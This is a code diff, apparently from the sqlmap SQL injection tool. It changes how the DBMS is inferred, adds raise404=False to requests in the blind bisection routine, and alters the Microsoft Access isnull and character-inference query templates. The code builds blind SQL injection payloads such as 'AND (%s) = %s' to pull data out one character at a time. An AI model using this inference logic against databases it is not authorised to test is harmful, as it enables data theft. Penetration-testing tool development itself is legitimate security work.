diff --git a/lib/controller/handler.py b/lib/controller/handler.py
index 0ab144281..042c725f1 100644
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -62,10 +62,7 @@ def setHandler():
                   ( SYBASE_ALIASES, SybaseMap, SybaseConn ),
                 ]
 
-    if kb.htmlFp:
-        inferencedDbms = kb.htmlFp[-1]
-    else:
-        inferencedDbms = None
+    inferencedDbms = (kb.htmlFp[-1] if kb.htmlFp else None) or kb.dbms
 
     for injection in kb.injections:
         if hasattr(injection, "dbms"):
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 7362d7815..b4f379fbc 100644
--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -127,7 +127,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 
             forgedPayload = safeStringFormat(payload.replace('%3E', '%3D'), (expressionUnescaped, idx, posValue))
             queriesCount[0] += 1
-            result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare)
+            result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
 
             if result:
                 return hintValue[idx-1]
@@ -161,7 +161,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
         if len(charTbl) == 1:
             forgedPayload = safeStringFormat(payload.replace('%3E', '%3D'), (expressionUnescaped, idx, charTbl[0]))
             queriesCount[0] += 1
-            result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare)
+            result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
 
             if result:
                 return chr(charTbl[0]) if charTbl[0] < 128 else unichr(charTbl[0])
@@ -181,7 +181,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                 forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(CHAR_INFERENCE_MARK, chr(posValue) if posValue < 128 else unichr(posValue))
 
             queriesCount[0] += 1
-            result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare)
+            result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
 
             if result:
                 minValue = posValue
@@ -233,7 +233,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                     for retVal in (originalTbl[originalTbl.index(minValue)], originalTbl[originalTbl.index(minValue) + 1]):
                         forgedPayload = safeStringFormat(payload.replace('%3E', '%3D'), (expressionUnescaped, idx, retVal))
                         queriesCount[0] += 1
-                        result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare)
+                        result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
 
                         if result:
                             return chr(retVal) if retVal < 128 else unichr(retVal)
@@ -433,7 +433,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                     query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (expressionUnescaped, testValue)))
                     query = agent.suffixQuery(query)
                     queriesCount[0] += 1
-                    result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare)
+                    result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
 
                     # Did we have luck?
                     if result:
@@ -457,7 +457,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                     query = agent.prefixQuery(safeStringFormat("AND (%s) = %s", (subquery, testValue)))
                     query = agent.suffixQuery(query)
                     queriesCount[0] += 1
-                    result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare)
+                    result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
 
                     # Did we have luck?
                     if result:
diff --git a/xml/queries.xml b/xml/queries.xml
index 1f38e3541..fb4717f54 100644
--- a/xml/queries.xml
+++ b/xml/queries.xml
@@ -335,7 +335,7 @@
     <dbms value="Microsoft Access">
         <cast query="CVAR(%s)"/>
         <length query="LEN(%s)"/>
-        <isnull query="IIF(ISNULL(%s), ' ', %s)"/>
+        <isnull query="IIF(LEN(%s)=0, ' ', %s)"/>
         <delimiter query=","/>
         <limit query="TOP %d"/>
         <limitregexp query="\s+TOP\s+([\d]+)"/>
@@ -352,7 +352,7 @@
         <!--CURRENTUSER() is not available outside the MS Access query tool itself-->
         <current_user/>
         <current_db/>
-        <inference query="MID((%s), %d, 1) > CHR(%d)"/>
+        <inference query="ASC(MID((%s), %d, 1)) > %d"/>
         <is_dba/>
         <dbs/>
         <!--MSysObjects have no read permission by default-->